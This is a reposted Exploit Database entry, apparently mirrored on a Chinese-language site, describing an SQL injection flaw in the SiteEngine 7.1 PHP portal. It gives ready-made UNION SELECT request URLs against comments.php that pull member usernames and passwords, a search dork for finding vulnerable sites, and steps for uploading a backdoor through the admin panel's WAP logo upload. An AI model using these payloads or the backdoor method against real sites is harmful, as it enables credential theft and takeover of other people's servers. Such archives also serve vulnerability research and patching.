SiteEngine 7.1 – SQL Injection

• Exploit Database
• 105 阅读

• 作者： Beach
  日期： 2010-11-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15612/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  ################################################################################# #Title: SiteEngine 7.1 SQL injection Vulnerability #Date:2010-11-25 #Author:Beach #Team:www.linux520.com #Vendor:www.siteengine.netwww.boka.cn #Dork:"Powered by SiteEngine" //300,000 +~ #Language:PHP #Greetz:birdarmy ################################################################################# [*]Description: Exploit this vulnerability comment must be enabled (default == enable) ################################################################################# [*]Exploit:   Enterprise Portal Version: [1]http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23   [2]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23   maybe have a different number of columns , you can try it ... ================================================================================== E-commerce Version:   [+]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23 ##################################################################################   Similar to other versions=) ################################################################################## [*]Upload backdoor: Administrator Panel: http://server/admin/   System maintainance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> Browse Right Now -> view properties [the URL is Ur backdoor] ##################################################################################